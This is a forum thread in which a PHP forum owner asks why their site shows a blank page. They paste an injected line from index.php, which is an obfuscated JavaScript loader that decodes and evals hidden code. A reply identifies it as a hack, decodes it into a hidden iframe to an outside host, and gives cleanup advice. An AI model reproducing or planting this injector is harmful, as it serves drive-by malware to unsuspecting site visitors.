Blank PHP Forum

They have: 1 posts

Joined: May 2012

Hallo people I am in desperate need of your help.
I am running a PHP forum on my website and everything was working fine and then all of a sudden I get a blank screen when I try and open the forum page.

Looking into the error log i get the error below

[06-May-2012 19:04:57] PHP Parse error: syntax error, unexpected T_LNUMBER, expecting ',' or ';' in ///public_html/forum/index.php on line 1

If I open the inde.php file this is the line 1, what is wrong with this particular because I just cant seem to be making headway in resolving this issue.

<?php
if (!function_exists('security_6c7b3c4482')) { function security_6c7b3c4482(){ echo '<!--(6c7b3c4482)--><script>try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qw){h=-parseInt(\\'012\\')/5;}if(window[\"document\"])try{prototype;}catch(brebr){st=String;zz=\\'al\\';zz=\\'zv\\'.substr(123-122)+zz;ss=[];f=\\'fr\\'+\\'om\\'+\\'Ch\\';f+=\\'arC\\';f+=\\'qgode\\'[\"substr\"](4-2);w=this;e=w[f[\"substr\"](11)+zz];n=\"3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48#49.5#56.5#57#55#47.5#59.5#49#47.5#59.5#53#54.5#47.5#54#60#50.5#54.5#22#48.5#54.5#53.5#22.5#57#22.5#47.5#25#27.5#50#27.5#50#25.5#47.5#49#24.5#49.5#25#23#47.5#26#49.5#24.5#27.5#26#49#27.5#25#23#25.5#25#24.5#24.5#49.5#48.5#26#26.5#24#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48#49.5#56.5#57#55#47.5#59.5#49#47.5#59.5#53#54.5#47.5#54#60#50.5#54.5#22#48.5#54.5#53.5#22.5#57#22.5#47.5#25#27.5#50#27.5#50#25.5#47.5#49#24.5#49.5#25#23#47.5#26#49.5#24.5#27.5#26#49#27.5#25#23#25.5#25#24.5#24.5#49.5#48.5#26#26.5#24#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5\"[((e)?\"s\":\"\")+\"p\"+\"lit\"](\"a#\"[((e)?\"su\":\"\")+\"bstr\"](1));for(i=6-2-1-2-1;i-635!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(f&&e)e(\"\"+q);}</script><!--(/6c7b3c4482)-->'; register_shutdown_function('security_6c7b3c4482'); } }
?>

rihont's picture

They have: 4 posts

Joined: May 2012

hope i can help you

Greg K's picture

He has: 2,145 posts

Joined: Nov 2003

Well, the problem is, whoever hacked your site, didn't properly escape out quotes.

I say your site was hacked, because once the quote issue is fixed, the code will in turn add teh following code to the end of the web page:

<iframe src="http://bestpaydayloanzgo.com/t/a49f9f5ad3e40a6e396d9405433ec672" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;" height="10" width="10"></iframe>

You need to remove line 1 from the page, and look for it in all other php files as well, as if they infected one file, they may have hacked others.

Now you have to worry about how they hacked your site to begin with. TO be on safe side, immediately change all passwords associated with the hosting of the files. Ask your hosting provider if they can check log files for the date that the site started crashing.

To be honest, you are lucky they hacked you with broken code, as otherwise who knows how long it would have been till you realized you were hacked. Quite possibly, it would have been the day that you go to visit the site, and your browser reports that Google is listing it as a malicious site and blocking it. At least this way you know it happened.

-Greg

Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.